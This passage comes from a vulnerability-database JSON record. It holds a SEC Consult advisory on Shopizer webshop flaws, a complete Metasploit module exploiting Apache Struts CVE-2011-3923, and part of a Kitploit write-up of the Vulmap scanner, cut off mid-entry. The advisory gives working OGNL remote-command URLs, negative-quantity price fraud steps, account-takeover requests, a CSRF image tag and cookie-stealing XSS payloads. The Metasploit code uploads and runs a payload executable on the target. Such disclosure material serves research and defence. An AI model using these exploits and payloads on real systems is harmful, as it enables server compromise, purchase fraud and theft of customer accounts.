"-----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\nSEC Consult Vulnerability Lab Security Advisory < 20140710-0 >\n=======================================================================\n title: Multiple critical vulnerabilities in Shopizer webshop\n product: Shopizer\n vulnerable version: 1.1.5 and below\n fixed version: v2 (new codebase)\n impact: critical\n homepage: http://www.shopizer.com/\n found: 2012-01-10\n by: Johannes Dahse, Johannes Greil\n SEC Consult Vulnerability Lab\n https://www.sec-consult.com\n=======================================================================\n\nVendor description:\n- -------------------\nShopizer is an open source java shopping cart and e-commerce content\nmanagement software (CMS). The system is built on Struts 2, Hibernate and\nSpring. JQuery ui and ajax are heavily used on the ui as well as DWR and\nStruts2-jQuery plug-in. (http://www.shopizer.com/)\n\n\nVulnerability overview/description:\n- -----------------------------------\nShopizer is prone to at least the following vulnerabilities, some of them are highly\ncritical:\n\n1.) Remote Command Execution\n\nShopizer 1.1.5 is using Apache Struts 2.2.1.1 and is thus vulnerable to Remote\nCommand Execution. Shopizer 1.1.3 and below is built on Apache Struts 2.1.6\nand is also affected.\n\nFore more details please refer to:\n * https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm#a18\n * http://blog.o0o.nu/2012/01/cve-2011-3923-yet-another-struts2.html\n\nThis affects the shop and admin interface (central).\n\n2.) Manipulation of product prices\n\nWhen buying products in Shopizer the product costs for a single product is\ncalculated by the selected quantity times the price of the product. The\ntotal costs of all products is the adding of all product costs. An attacker\ncan specify negative quantities to decrease the total costs.\n\nThis affects the shop.\n\n3.) Manipulation of customer data / mass assignment\n\nAn attacker can change the contact details of a customer by modifying the\ncustomerId in the change request. In example this allows him to modify the\nshipping address to retrieve products bought by another customer.\n\nFurthermore, a malicious admin user (sm-central) is able to change the\npasswords of other user accounts by appending a \"customer.customerPassword\"\nHTTP parameter when saving user details. This is possible _although_ there\nis no UI (form field) for this within the admin interface.\n\nThis affects the shop and admin interface (central).\n\n4.) Cross-Site Request Forgery\n\nModifying customer data is also prone to CSRF attacks. Additionally, the\nattacker can change customer passwords, shop configuration, product details\nand product prices by sending CSRF requests to the administration interface.\n\nThis affects the shop and admin interface (central).\n\n5.) Missing anti brute force protection\n\nNo protection against brute force attacks regarding login credentials is\nimplemented. Attackers can guess for weak passwords of users, as the\npassword policy of the shop only allows exactly between 6 and 8 characters.\nThe use of special chars or digits is not being enforced.\n\nThis affects the shop and admin interface (central).\n\n6.) Cross-Site Scripting\n\nThe Shopizer Admin Interface suffers from multiple reflected XSS\nvulnerabilities.\n\n\n\nProof of concept:\n- -----------------\n1.) Remote Command Execution in Struts\n\na) Via exception\n\nThe following URL will trigger an exception for an invalid \"productId\" data\ntype and Struts will re-evaluate the specified value as OGNL expression. An\nattacker can successfully bypass security restrictions of Struts and execute\narbitrary Java code, leading to Remote Command Execution.\n /shop/product/reviews.action?product.productId=secconsult'%2b(%23context[\"xwork.MethodAccessor.denyMethodExecution\"]=false,%23_memberAccess[\"allowStaticMethodAccess\"]=true,@java.lang.Runtime@getRuntime().exec('calc'))%2b'\n\nOther numeric parameters are affected as well.\n\nb) Via ParameterInterceptor\n\nThe following URL will store a OGNL expression in the property \"search\" of\ntype String. This OGNL expression can then be accessed by a dynamic function\ncall in another parameter leading to Remote Command Execution.\n /shop/search.action?search=(%23context[\"xwork.MethodAccessor.denyMethodExecution\"]=false,%23_memberAccess[\"allowStaticMethodAccess\"]=true,@java.lang.Runtime@getRuntime().exec('calc'))(secconsult)&z[(search)('secconsult')]=true\n\n \n2.) Manipulation of product prices\n\nAssuming the shop has a product1 (300$) and a product2 (290$) for the total\ncosts of 590$. The following steps can be reproduced by a malicious user to\ndecrease the total costs when buying those products:\n\n a) Add product1 and product2 to the shopping cart\n b) Go to the shopping cart and press \"recalculate\"\n c) Intercept the ajax DWR request and modify the number reference of the\n parameter \"productQuantity\" for product2 to a negative value (-1):\n\n c0-e3=string:2\n c0-e4=number:-1\n c0-e1=Object_Object:{productId:reference:c0-e3, productQuantity:reference:c0-e4}\n\n d) The new costs for product2 now recalculate to: -1 x 290 = -290$\n e) the new total costs is: product1 + product2 = 300$ + (-290$) = 10$\n f) continue shopping and pay 10$ for products worth 590$.\n\nThis is especially critical for shops that only provide digital products.\n\nFurthermore, during the second step of the checkout process it is\npossible to add a negative quantity of products exploiting a Shopizer's\nfeature called \"standalone shopping cart\". This results in a negative price.\nBy issuing the following specially crafted request in the separate tab of\nthe web browser, while the first tab contains the second step of the checkout\nprocess, the total price will be decreased. Note that the page must be\nrefreshed after the request to reflect the changes.\n\n /shop/cart/addToCart?merchantId=1&productId=43&qty=-240\n\n\n3.) Manipulation of customer data / mass assignment\n\nIt's possible to overwrite user data of an arbitrary\nuser and gain access to his account and personal information _when\nregistering a new user_.\nTo achieve this, a malicious user has to add the customer.customerId\nparameter to the HTTP request and specify the value of the parameter\nto match the target user e.g. 87 when registering a new user.\nFor example, the following request will overwrite the user data\nincluding username and password of the user with the ID 87.\n\n POST /shop/profile/register.action HTTP/1.1\n [...]\n struts.token.name=struts.token&struts.token=8393EPOT4BN4CNYAJ6ETRI9DNR2FSP1R&formstate=list&customer.customerNick=SecTest&newPassword=SecTest123&repeatNewPassword=SecTest123&customer.customerCompany=SecTest&customer.customerGender=M&customer.customerTitel=SecTest&customer.customerFirstname=SecTest&customer.customerLastname=SecTest&customer.customerTelephone=&customer.customerEmailAddress=sectest@example.com&customer.customerCountryId=14&customer.customerZoneId=95&customer.customerPostalCode=SecTest&customer.customerCity=SecTest&customer.customerStreetAddress=SecTest&customer.customerHouseAddress=SecTest&captcha_honeypot=&customer.customerPrivacyRules=1&customer.customerId=87\n\nIn this case no account confirmation is needed. Instant access\nto the overwritten account and its data is possible using the\nnew username SecTest and the newly specified password! An attacker is able to\naccess sensitive data (order information,\npersonal information etc.).\n\nAdditionally, the following request will overwrite the contact data of customer id 10,\nincluding the name, shipping address and billing address:\n /shop/profile/changeAddress.action?formstate=list&customer.customerId=10&customer.customerCompany=secconsult&customer.customerGender=&customer.customerTitel=&customer.customerFirstname=secconsult&customer.customerLastname=secconsult&customer.customerTelephone=00&customer.customerEmailAddress=owned@secconsult.com&customer.customerCountryId=14&customer.customerZoneId=95&customer.customerPostalCode=1190&customer.customerCity=secconsult&customer.customerStreetAddress=secconsult&customer.customerHouseAddress=17&customer.customerAnonymous=false&customer.customerBillingTitel=&customer.customerBillingFirstName=secconsult&customer.customerBillingLastName=secconsult&customer.customerBillingStreetAddress=secconsult&customer.customerBillingHouseAddress=17&customer.customerBillingCity=secconsult&customer.customerBillingZoneId=95&customer.customerBillingState=secconsult&customer.customerBillingPostalCode=1190&customer.customerBillingCountryId=14&customer.customerLang=de&customer.customerPrivacyRul\nes=1&customer.\ncustomerNick=secconsult\n\nNote that in this specific case the account of the attacker and the victim will not\nbe able to login again after the attack, because the nickname will be\noverwritten and found twice during login.\n\nFurthermore, the administration interface does not offer a UI to change user\npasswords. By appending the parameter \"customer.customerPassword\" an attacker\nis able to change the password of arbitrary users within the customer details\npage.\n\n\n4.) Cross-Site Request Forgery\n\nThe following image will alter the product price for the product 30 when\nrendered by the browser of an logged in webshop administrator:\n\n <img\nsrc=\"/central/catalog/saveproduct.action?categ=30&product.productType=1&product.productStatus=true&__checkbox_product.productStatus=true&__checkbox_product.productVirtual=true&__checkbox_product.productIsFree=false&dateavailable=2012-01-24&price=1.00&product.productExternalDl=1&names[0]=secconsult&seo[0]=secconsult&title[0]=secconsult&highlights[0]=secconsult&descriptions[0]=secconsult&metadescriptions[0]=secconsult&downloadurl[0]=&uploadimage=&weight=1.0&width=1.0&length=1.0&height=1.0&product.productQuantity=99&product.productQuantityOrderMax=99&product.productSortOrder=1&product.productTaxClassId=1&product.productId=30&product.productImage=&product.productImageLarge=&product.productImage1=&product.productImage2=&product.productImage3=&product.productImage4=\"/>\n\nFurthermore, the parameter \"__checkbox_product.productIsFree\" can also be set\nto \"true\".\n\nAdditionally, the administration interface allows to overwrite the password\nhash of every customer which can also be exploited via CSRF.\n\nThe product review form is also vulnerable to Cross-Site Request Forgery\nattacks. A similar request to the following URL will result in a product\nreview being posted in the context of the currently logged in user. Note\nthat the URL does not contain any parameter that is holding a nonce value.\n\n\n/shop/product/createReview.action?product.productId=43&rating=5&star=5&reviewText=Excellent&=\n\n\n5.) Missing anti brute force protection\n\nNo proof-of-concept is necessary. See source:\nsm-central/src/com/salesmanager/central/profile/ProfileAction.java\nLine 525 - 530 of shopizer 1.1.5\n\n\n6.) Cross-Site Scripting\n\n /central/orders/searchcriteria.action?customername=\"><script>alert(document.cookie)</script>\n /central/catalog/productlist.action?productname=\"><script>alert(document.cookie)</script>&availability=2\"><script>alert(document.cookie)</script>&status=2\"><script>alert(document.cookie)</script>\n\nE.g. source code:\nsm-central/WebContent/orders/orderlist.jsp\nLine: 118\n\nSEC Consult assumes, that many more XSS vulnerabilities exist within this\nsoftware as no proper filtering is implemented.\n\n\n\nVulnerable / tested versions:\n- -----------------------------\nAll vulnerabilities could be reproduced with Shopizer 1.1.5 and 1.1.3\n\n\n\nVendor contact timeline:\n- ------------------------\n2012-01-10: The vulnerabilities have been found during a short blackbox test\n of a shopizer installation during a customer project\n2012-12-20: Customer allows contacting vendor\n2013-01-10: Contacting vendor through support@shopizer.com, fast reply,\n sending advisory\n2013-01-22: Asking for status update, reply: vendor takes a look\n2013-02-26: Asking for status update, vendor has some questions regarding\n version numbers\n2013-03-22: Asking for status update again\n2013-03-23: Vendor: Release 2 is scheduled for June\n2013-06-25: Asking for status update, no answer\n2013-07-01: Sending deadline for advisory release\n2013-07-07: Vendor: Version 2 of shopizer delayed\n2013-07-08: Asking for new release date\n2013-07-09: Vendor: moving from Struts to Spring & Spring security\n2013-10-03: Asking again for release date\n2013-10-06: Vendor: Release shortly\n2013-12-10: Asking for update\n2013-12-12: Vendor: Release date set for January 2014\n2014-06: Vendor releases v2\n2014-07-10: SEC Consult releases security advisory\n\n\n\nSolution:\n- ---------\nUsing the old version branch 1.x is not recommended as there are no security\nfixes implemented by the vendor.\n\nVersion 2 has been released by the vendor, but it has not been tested by SEC\nConsult and it is unclear whether the issues have been solved.\n\n\nWorkaround:\n- -----------\nThese workarounds have to be implemented in source:\n* Update the Apache Struts library to the latest version available.\n* Disallow negative product quantities.\n* Identify customers by session and not by customerId parameter.\n\nFurthermore, change the default login (admin:password) for the administration\ninterface.\n\n\nAdvisory URL:\n- -------------\nhttps://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm\n\n\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\nSEC Consult Vulnerability Lab\n\nSEC Consult\nVienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius\n\nHeadquarter:\nMooslackengasse 17, 1190 Vienna, Austria\nPhone: +43 1 8903043 0\nFax: +43 1 8903043 15\n\nMail: research at sec-consult dot com\nWeb: https://www.sec-consult.com\nBlog: http://blog.sec-consult.com\nTwitter: https://twitter.com/sec_consult\n\nEOF J. Dahse, J. Greil / 2012, 2013, 2014\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v2\n\niQEcBAEBAgAGBQJTvmP8AAoJECyFJyAEdlkKIvIH/jN5QXxf98jLswdxXH7bpHND\nOmX43+f2o119h7jphQierfe2Fj5NqG3l+9Gldb601SYtdOXldI5Dn/GSByZb0NbD\nXn5i9SeRNzbxPghCX7JubHaJX86HKoxrks34Hgoe7/v5A4rkIs3XA868tIODWq/j\nFCSnwn3I7DQu8lSR1PzbzTX2aOnilTAdmSTFH5MahMXrVgk3YHwNbtVIDz6/xriW\nynsvLr709i/fQWEhwo4OoTwhyHwhrjPjY3jQNhcO70OMjG1kWqULFySGWNeVof0k\na2K/EHcqiDPFyrpHifvVheOeQaPoFO5CL/Ze7cV7B9vRi9WPo3Y07wNfnJiYOdY=\n=3Hvl\n-----END PGP SIGNATURE-----", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2022-08-16T08:47:53", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2013-03-22T00:00:00", "type": "exploitdb", "title": "Apache Struts - 'ParametersInterceptor' Remote Code Execution (Metasploit)", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2011-3923", "CVE-2011-3923"], "modified": "2013-03-22T00:00:00", "id": "EDB-ID:24874", "href": "https://www.exploit-db.com/exploits/24874", "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# web site for more information on licensing and terms of use.\r\n# http://metasploit.com/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::EXE\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Apache Struts ParametersInterceptor Remote Code Execution',\r\n 'Description' => %q{\r\n This module exploits a remote command execution vulnerability in Apache Struts\r\n versions < 2.3.1.2. This issue is caused because the ParametersInterceptor allows\r\n for the use of parentheses which in turn allows it to interpret parameter values as\r\n OGNL expressions during certain exception handling for mismatched data types of\r\n properties which allows remote attackers to execute arbitrary Java code via a\r\n crafted parameter.\r\n },\r\n 'Author' =>\r\n [\r\n 'Meder Kydyraliev', # Vulnerability Discovery and PoC\r\n 'Richard Hicks <scriptmonkey.blog[at]gmail.com>', # Metasploit Module\r\n 'mihi' #ARCH_JAVA support\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'References' =>\r\n [\r\n [ 'CVE', '2011-3923'],\r\n [ 'OSVDB', '78501'],\r\n [ 'URL', 'http://blog.o0o.nu/2012/01/cve-2011-3923-yet-another-struts2.html'],\r\n [ 'URL', 'https://cwiki.apache.org/confluence/display/WW/S2-009']\r\n ],\r\n 'Platform' => [ 'win', 'linux', 'java'],\r\n 'Privileged' => true,\r\n 'Targets' =>\r\n [\r\n ['Windows Universal',\r\n {\r\n 'Arch' => ARCH_X86,\r\n 'Platform' => 'windows'\r\n }\r\n ],\r\n ['Linux Universal',\r\n {\r\n 'Arch' => ARCH_X86,\r\n 'Platform' => 'linux'\r\n }\r\n ],\r\n [ 'Java Universal',\r\n {\r\n 'Arch' => ARCH_JAVA,\r\n 'Platform' => 'java'\r\n },\r\n ]\r\n ],\r\n 'DisclosureDate' => 'Oct 01 2011',\r\n 'DefaultTarget' => 2))\r\n\r\n register_options(\r\n [\r\n Opt::RPORT(8080),\r\n OptString.new('PARAMETER',[ true, 'The parameter to perform injection against.',\"username\"]),\r\n OptString.new('TARGETURI', [ true, 'The path to a struts application action with the location to perform the injection', \"/blank-struts2/login.action?INJECT\"]),\r\n OptInt.new('CHECK_SLEEPTIME', [ true, 'The time, in seconds, to ask the server to sleep while check', 5])\r\n ], self.class)\r\n end\r\n\r\n def execute_command(cmd, opts = {})\r\n inject = \"PARAMETERTOKEN=(#context[\\\"xwork.MethodAccessor.denyMethodExecution\\\"]=+new+java.lang.Boolean(false),#_memberAccess[\\\"allowStaticMethodAccess\\\"]\"\r\n inject << \"=+new+java.lang.Boolean(true),CMD)('meh')&z[(PARAMETERTOKEN)(meh)]=true\"\r\n inject.gsub!(/PARAMETERTOKEN/,Rex::Text::uri_encode(datastore['PARAMETER']))\r\n inject.gsub!(/CMD/,Rex::Text::uri_encode(cmd))\r\n uri = String.new(datastore['TARGETURI'])\r\n uri = normalize_uri(uri)\r\n uri.gsub!(/INJECT/,inject) # append the injection string\r\n resp = send_request_cgi({\r\n 'uri' => uri,\r\n 'version' => '1.1',\r\n 'method' => 'GET',\r\n })\r\n return resp #Used for check function.\r\n end\r\n\r\n def exploit\r\n #Set up generic values.\r\n @payload_exe = rand_text_alphanumeric(4+rand(4))\r\n pl_exe = generate_payload_exe\r\n append = 'false'\r\n #Now arch specific...\r\n case target['Platform']\r\n when 'linux'\r\n @payload_exe = \"/tmp/#{@payload_exe}\"\r\n chmod_cmd = \"@java.lang.Runtime@getRuntime().exec(\\\"/bin/sh_-c_chmod +x #{@payload_exe}\\\".split(\\\"_\\\"))\"\r\n exec_cmd = \"@java.lang.Runtime@getRuntime().exec(\\\"/bin/sh_-c_#{@payload_exe}\\\".split(\\\"_\\\"))\"\r\n when 'java'\r\n @payload_exe << \".jar\"\r\n pl_exe = payload.encoded_jar.pack\r\n exec_cmd = \"\"\r\n exec_cmd << \"#q=@java.lang.Class@forName('ognl.OgnlRuntime').getDeclaredField('_jdkChecked'),\"\r\n exec_cmd << \"#q.setAccessible(true),#q.set(null,true),\"\r\n exec_cmd << \"#q=@java.lang.Class@forName('ognl.OgnlRuntime').getDeclaredField('_jdk15'),\"\r\n exec_cmd << \"#q.setAccessible(true),#q.set(null,false),\"\r\n exec_cmd << \"#cl=new java.net.URLClassLoader(new java.net.URL[]{new java.io.File('#{@payload_exe}').toURI().toURL()}),\"\r\n exec_cmd << \"#c=#cl.loadClass('metasploit.Payload'),\"\r\n exec_cmd << \"#c.getMethod('main',new java.lang.Class[]{@java.lang.Class@forName('[Ljava.lang.String;')}).invoke(\"\r\n exec_cmd << \"null,new java.lang.Object[]{new java.lang.String[0]})\"\r\n when 'windows'\r\n @payload_exe = \"./#{@payload_exe}.exe\"\r\n exec_cmd = \"@java.lang.Runtime@getRuntime().exec('#{@payload_exe}')\"\r\n else\r\n fail_with(Exploit::Failure::NoTarget, 'Unsupported target platform!')\r\n end\r\n\r\n #Now with all the arch specific stuff set, perform the upload.\r\n #109 = length of command string plus the max length of append.\r\n sub_from_chunk = 109 + @payload_exe.length + datastore['TARGETURI'].length + datastore['PARAMETER'].length\r\n chunk_length = 2048 - sub_from_chunk\r\n chunk_length = ((chunk_length/4).floor)*3\r\n while pl_exe.length > chunk_length\r\n java_upload_part(pl_exe[0,chunk_length],@payload_exe,append)\r\n pl_exe = pl_exe[chunk_length,pl_exe.length - chunk_length]\r\n append = true\r\n end\r\n java_upload_part(pl_exe,@payload_exe,append)\r\n execute_command(chmod_cmd) if target['Platform'] == 'linux'\r\n execute_command(exec_cmd)\r\n register_files_for_cleanup(@payload_exe)\r\n end\r\n\r\n def java_upload_part(part, filename, append = 'false')\r\n cmd = \"\"\r\n cmd << \"#f=new java.io.FileOutputStream('#{filename}',#{append}),\"\r\n cmd << \"#f.write(new sun.misc.BASE64Decoder().decodeBuffer('#{Rex::Text.encode_base64(part)}')),\"\r\n cmd << \"#f.close()\"\r\n execute_command(cmd)\r\n end\r\n\r\n def check\r\n sleep_time = datastore['CHECK_SLEEPTIME']\r\n check_cmd = \"@java.lang.Thread@sleep(#{sleep_time * 1000})\"\r\n t1 = Time.now\r\n print_status(\"Asking remote server to sleep for #{sleep_time} seconds\")\r\n response = execute_command(check_cmd)\r\n t2 = Time.now\r\n delta = t2 - t1\r\n\r\n\r\n if response.nil?\r\n return Exploit::CheckCode::Safe\r\n elsif delta < sleep_time\r\n return Exploit::CheckCode::Safe\r\n else\r\n return Exploit::CheckCode::Appears\r\n end\r\n end\r\n\r\nend", "sourceHref": "https://www.exploit-db.com/download/24874", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "kitploit": [{"lastseen": "2022-04-07T12:02:21", "description": "[![](https://1.bp.blogspot.com/-KABdDCvkQwg/X-K8tydG2pI/AAAAAAAAUvc/dR5VJ69ZRm8wEgBjOLkEBdJ3-MPZhg0TQCNcBGAsYHQ/s16000/vulmap.png)](<https://1.bp.blogspot.com/-KABdDCvkQwg/X-K8tydG2pI/AAAAAAAAUvc/dR5VJ69ZRm8wEgBjOLkEBdJ3-MPZhg0TQCNcBGAsYHQ/s678/vulmap.png>)\n\n \n\n\nVulmap is a vulnerability scanning tool that can scan for vulnerabilities in Web containers, Web servers, Web middleware, and CMS and other Web programs, and has vulnerability exploitation functions. Relevant testers can use vulmap to detect whether the target has a specific vulnerability, and can use the vulnerability exploitation function to verify whether the vulnerability actually exists.\n\nVulmap currently has vulnerability scanning (poc) and exploiting (exp) modes. Use \"-m\" to select which mode to use, and the default poc mode is the default. In poc mode, it also supports \"-f\" batch target scanning, \"-o\" File output results and other main functions, Other functions [Options](<https://github.com/zhzyker/vulmap/#options>) Or python3 vulmap.py -h, the Poc function will no longer be provided in the exploit exploit mode, but the exploit will be carried out directly, and the exploit result will be fed back to further verify whether the vulnerability exists and whether it can be exploited.\n\n**Try to use \"-a\" to establish target types to reduce false positives, such as \"-a solr\"**\n\n \n\n\n### Installation\n\nThe operating system must have python3, python3.7 or higher is recommended\n\n * Installation dependency\n \n \n pip3 install -r requirements.txt\n \n\n * Linux & MacOS & Windows\n \n \n python3 vulmap.py -u http://example.com\n \n\n \n\n\n### Options\n \n \n optional arguments:\n -h, --help show this help message and exit\n -u URL, --url URL Target URL (e.g. -u \"http://example.com\")\n -f FILE, --file FILE Select a target list file, and the url must be distinguished by lines (e.g. -f \"/home/user/list.txt\")\n -m MODE, --mode MODE The mode supports \"poc\" and \"exp\", you can omit this option, and enter poc mode by default\n -a APP, --app APP Specify a web app or cms (e.g. -a \"weblogic\"). default scan all\n -c CMD, --cmd CMD Custom RCE vuln command, Other than \"netstat -an\" and \"id\" can affect program judgment. defautl is \"netstat -an\"\n -v VULN, --vuln VULN Exploit, Specify the vuln number (e.g. -v \"CVE-2020-2729\")\n --list Displays a list of vulnerabilities that support scanning\n --debug Debug mode echo request and responses\n --delay DELAY Delay check time, default 0s\n --timeout TIMEOUT Scan timeout time, default 10s\n --output FILE Text mode export (e.g. -o \"result.txt\")\n \n\n \n\n\n### Examples\n\nTest all vulnerabilities poc mode\n \n \n python3 vulmap.py -u http://example.com\n \n\nFor RCE vuln, use the \"id\" command to test the vuln, because some linux does not have the \"netstat -an\" command\n \n \n python3 vulmap.py -u http://example.com -c \"id\"\n \n\nCheck <http://example.com> for struts2 vuln\n \n \n python3 vulmap.py -u http://example.com -a struts2\n \n \n \n python3 vulmap.py -u http://example.com -m poc -a struts2\n \n\nExploit the CVE-2019-2729 vuln of WebLogic on <http://example.com:7001>\n \n \n python3 vulmap.py -u http://example.com:7001 -v CVE-2019-2729\n \n \n \n python3 vulmap.py -u http://example.com:7001 -m exp -v CVE-2019-2729\n \n\nBatch scan URLs in list.txt\n \n \n python3 vulmap.py -f list.txt\n \n\nExport scan results to result.txt\n \n \n python3 vulmap.py -u http://example.com:7001 -o result.txt\n \n\n \n\n\n### Vulnerabilitys List\n\nVulmap supported vulnerabilities are as follows\n \n \n +-------------------+------------------+-----+-----+-------------------------------------------------------------+\n | Target type | Vuln Name | Poc | Exp | Impact Version && Vulnerability description |\n +-------------------+------------------+-----+-----+-------------------------------------------------------------+\n | Apache Shiro | CVE-2016-4437 | Y | Y | <= 1.2.4, shiro-550, rememberme deserialization rce |\n | Apache Solr | CVE-2017-12629 | Y | Y | < 7.1.0, runexecutablelistener rce & xxe, only rce is here |\n | Apache Solr | CVE-2019-0193 | Y | N | < 8.2.0, dataimporthandler module remote code execution |\n | Apache Solr | CVE-2019-17558 | Y | Y | 5.0.0 - 8.3.1, velocity response writer rce |\n | Apache Struts2 | S2-005 | Y | Y | 2.0.0 - 2.1.8.1, cve-2010-1870 parameters interceptor rce |\n | Apache Struts2 | S2-008 | Y | Y | 2.0.0 - 2.3.17, debugging interceptor rce |\n | Apache Struts2 | S2-009 | Y | Y | 2.1.0 - 2.3.1.1, cve-2011-3923 ognl interpreter rce |\n | Apache Struts2 | S2-013 | Y | Y | 2.0.0 - 2.3.14.1, cve-2013-1966 ognl interpreter rce |\n | Apache Struts2 | S2-015 | Y | Y | 2.0.0 - 2.3.14.2, cve-2013-2134 ognl interpreter rce |\n | Apache Struts2 | S2-016 | Y | Y | 2.0.0 - 2.3.15, cve-2013-2251 ognl interpreter rce |\n | Apache Struts2 | S2-029 | Y | Y | 2.0.0 - 2.3.24.1, ognl interpreter rce |\n | Apache Struts2 | S2-032 | Y | Y | 2.3.20-28, cve-2016-3081 rce can be performed via method |\n | Apache Struts2 | S2-045 | Y | Y | 2.3.5-31, 2.5.0-10, cve-2017-5638 jakarta multipart rce |\n | Apache Struts2 | S2-046 | Y | Y | 2.3.5-31, 2.5.0-10, cve-2017-5638 jakarta multipart rce |\n | Apache Struts2 | S2-048 | Y | Y | 2.3.x, cve-2017-9791 struts2-struts1-plugin rce |\n | Apache Struts2 | S2-052 | Y | Y | 2.1.2 - 2.3.33, 2.5 - 2.5.12 cve-2017-9805 rest plugin rce |\n | Apache Struts2 | S2-057 | Y | Y | 2.0.4 - 2.3.34, 2.5.0-2.5.16, cve-2018-11776 namespace rce |\n | Apache Struts2 | S2-059 | Y | Y | 2.0.0 - 2.5.20 cve-2019-0230 ognl interpreter rce |\n | Apache Struts2 | S2-devMode | Y | Y | 2.1.0 - 2.5.1, devmode remote code execution |\n | Apache Tomcat | Examples File | Y | N | all version, /examples/servlets/servlet/SessionExample |\n | Apache Tomcat | CVE-2017-12615 | Y | Y | 7.0.0 - 7.0.81, put method any files upload |\n | Apache Tomcat | CVE-2020-1938 | Y | Y | 6, 7 < 7.0.100, 8 < 8.5.51, 9 < 9.0.31 arbitrary file read |\n | Drupal | CVE-2018-7600 | Y | Y | 6.x, 7.x, 8.x, drupalgeddon2 remote code execution |\n | Drupal | CVE-2018-7602 | Y | Y | < 7.59, < 8.5.3 (except 8.4.8) drupalgeddon2 rce |\n | Drupal | CVE-2019-6340 | Y | Y | < 8.6.10, drupal core restful remote code execution |\n | Jenkins | CVE-2017-1000353 | Y | N | <= 2.56, LTS <= 2.46.1, jenkins-ci remote code execution |\n | Jenkins | CVE-2018-1000861 | Y | Y | <= 2.153, LTS <= 2.138.3, remote code execution |\n | Nexus OSS/Pro | CVE-2019-7238 | Y | Y | 3.6.2 - 3.14.0, remote code execution vulnerability |\n | Nexus OSS/Pro | CVE-2020-10199 | Y | Y | 3.x <= 3.21.1, remote code execution vulnerability |\n | Oracle Weblogic | CVE-2014-4210 | Y | N | 10.0.2 - 10.3.6, weblogic ssrf vulnerability |\n | Oracle Weblogic | CVE-2017-3506 | Y | Y | 10.3.6.0, 12.1.3.0, 12.2.1.0-2, weblogic wls-wsat rce |\n | Oracle Weblogic | CVE-2017-10271 | Y | Y | 10.3.6.0, 12.1.3.0, 12.2.1.1-2, weblogic wls-wsat rce |\n | Oracle Weblogic | CVE-2018-2894 | Y | Y | 12.1.3.0, 12.2.1.2-3, deserialization any file upload |\n | Oracle Weblogic | CVE-2019-2725 | Y | Y | 10.3.6.0, 12.1.3.0, weblogic wls9-async deserialization rce |\n | Oracle Weblogic | CVE-2019-2729 | Y | Y | 10.3.6.0, 12.1.3.0, 12.2.1.3 wls9-async deserialization rce |\n | Oracle Weblogic | CVE-2020-2551 | Y | N | 10.3.6.0, 12.1.3.0, 12.2.1.3-4, wlscore deserialization rce |\n | Oracle Weblogic | CVE-2020-2555 | Y | Y | 3.7.1.17, 12.1.3.0.0, 12.2.1.3-4.0, t3 deserialization rce |\n | Oracle Weblogic | CVE-2020-2883 | Y | Y | 10.3.6.0, 12.1.3.0, 12.2.1.3-4, iiop t3 deserialization rce |\n | Oracle Weblogic | CVE-2020-14882 | Y | Y | 10.3.6.0, 12.1.3.0, 12.2.1.3-4, 14.1.1.0.0, console rce |\n | RedHat JBoss | CVE-2010-0738 | Y | Y | 4.2.0 - 4.3.0, jmx-console deserialization any files upload |\n | RedHat JBoss | CVE-2010-1428 | Y | Y | 4.2.0 - 4.3.0, web-console deserialization any files upload |\n | RedHat JBoss | CVE-2015-7501 | Y | Y | 5.x, 6.x, jmxinvokerservlet deserialization any file upload |\n | ThinkPHP | CVE-2019-9082 | Y | Y | < 3.2.4, thinkphp rememberme deserialization rce |\n | ThinkPHP | CVE-2018-20062 | Y | Y | <= 5.0.23, 5.1.31, thinkphp rememberme deserialization rce |\n +-------------------+------------------+-----+-----+-------------------------------------------------------------+\n \n\n \n\n\n### Docker\n \n \n docker build -t vulmap/vulmap .\n docker run --rm -ti vulmap/vulmap python vulmap.py -u https://www.example.com\n\n \n\n\n \n \n\n\n**[Download Vulmap](<https://github.com/zhzyker/vulmap> \"Download Vulmap\" )**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-12-25T11:30:00", "type": "kitploit", "title": "Vulmap - Web Vulnerability 